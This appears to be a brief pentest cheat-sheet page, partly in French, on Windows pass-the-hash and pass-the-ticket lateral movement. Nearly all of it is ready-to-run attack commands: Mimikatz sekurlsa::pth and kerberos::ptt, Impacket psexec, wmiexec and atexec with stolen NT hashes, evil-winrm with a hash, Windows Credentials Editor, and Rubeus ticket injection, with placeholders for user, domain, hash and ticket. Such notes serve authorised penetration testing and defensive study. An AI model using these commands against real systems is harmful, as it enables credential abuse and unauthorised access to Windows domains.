🚧Pass the Hash/Ticket
Pass the Hash
Mimikatz :
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'Impacket :
psexec_windows.exe -hashes ":NTHASH" user@<domain>
wmiexec_windows.exe -hashes ":NTHASH" user@<domain>
atexec_windows.exe -hashes ":NTHASH" user@<domain> 'whoami'EvilWin-RM:
evil-winrm -u <username> -H <Hash> -i <IP>Windows Credentials Editor :
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>Pass the Ticket
Récupérer les tickets en mémoire :
mimikatz.exe "kerberos::ptt "kirbi_ticket"
.\Rubeus.exe ptt /ticket:kirbi_ticketLast updated
Was this helpful?